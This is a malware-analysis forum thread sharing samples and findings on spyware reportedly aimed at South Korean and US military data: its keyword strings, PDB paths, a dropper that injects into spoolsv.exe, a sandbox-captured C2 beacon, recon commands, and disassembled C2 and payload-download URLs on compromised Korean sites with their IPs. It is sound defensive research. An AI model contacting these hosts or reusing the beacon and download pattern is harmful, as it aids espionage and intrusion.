A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #26654  by R136a1
 Thu Sep 03, 2015 2:39 pm
Hi folks,

attached are samples of a malware with alleged purpose to steal sensitive information from South Korea / U.S. military.

Abstract of strings:
Code: Select all
Military
military
MILITARY
weapon
Weapon
WEAPON
battle
Battle
BATTLE
munition
missile
Missile
MISSILE
Aircraft
Figther
Resolve
resolve
Operation
operation
OPERATION
Air Force
AirForce
airforce
AF Portal
AFPortal
EMAIL
AIRFORCE
AIR FORCE
email
KORCOM
CENTRIX
KR/FE
Intranet
intranet
TNOSC
COMSEC
PACCOM
PENTAGON
cassifi
securet
CASSIFI
Cassifi
Certificat
CERTIFICAT
Pentagon
pentagon
Samples:
https://www.virustotal.com/en/file/1f04 ... /analysis/ (Dropper)
https://www.virustotal.com/en/file/2d8b ... /analysis/ (Dropper)
https://www.virustotal.com/en/file/4df7 ... /analysis/ (Payload)
https://www.virustotal.com/en/file/020c ... /analysis/ (Payload)
Attachments
PW: infected
(1.08 MiB) Downloaded 93 times
 #26655  by Xylitol
 Thu Sep 03, 2015 5:13 pm
g:\mail\pc-util\back\backdoor1\Release\BsDll.pdb
g:\작전준비\Tong\백도어\17th_Backdoor\BsDll-up\Release\BsDll.pdb

Some references to BsDll:
https://blogs.mcafee.com/mcafee-labs/di ... uth-korea/
https://www.blackhat.com/docs/asia-14/m ... Beyond.pdf
 #26657  by Xylitol
 Thu Sep 03, 2015 6:52 pm
Dropper is having commercial packer layer, overall for the work it inject mfc80u.dll inside spoolsv.exe with the hostile code of ressource 'exe' on the dropper and then self delete with a lame .bat
Image
Strings from the payload, seem using irc protocol and also interested by AhnLab, ViRobot, ESTsoft and PhysicalDrive0
Haven't looked further.
Image

From a cuckoo run:
Code: Select all
GET /bbs/install1_ok.php?no=0&id=v^086C1F25&sn=1406747&sc=5fb84e8bec4d5565b4be6dd0b73c1f0a HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: www.secretstudy.com
Connection: Keep-Alive
It create a sysinfo.log file containing the output of
Code: Select all
date
time
ipconfig /all
netstat -an
And also created a password protected archive containing information about the endpoint.
Second payload, urls gathering:
Code: Select all
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://www.knuegerman.net/bbs/list_all_ok.php"
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://inmac3.snu.ac.kr/bbs/list_all_ok.php"
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://ymath.yonsei.ac.kr/bbs/list_all_ok.php"
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://www.objectworld.org/zboard/list_all_ok.php"
100027B5    68 88A60210     PUSH mfc80u.1002A688                     ; ASCII "http://dblab.skku.ac.kr/bbs/list_all_ok.php"
URLDownloadToFileA > http://www.jejuhawaii.co.kr/zb41/images/inst_step11.gif
Url proc:
Image
• dns: 1 ›› ip: 174.36.107.130 - adress: SECRETSTUDY.COM
• dns: 0 ›› ip: - adress: KNUEGERMAN.NET
• dns: 1 ›› ip: 147.46.66.129 - adress: INMAC3.SNU.AC.KR
• dns: 1 ›› ip: 165.132.220.45 - adress: YMATH.YONSEI.AC.KR
• dns: 1 ›› ip: 222.122.84.45 - adress: OBJECTWORLD.ORG
• dns: 1 ›› ip: 115.145.174.171 - adress: DBLAB.SKKU.AC.KR
• dns: 1 ›› ip: 124.217.198.253 - adress: JEJUHAWAII.CO.KR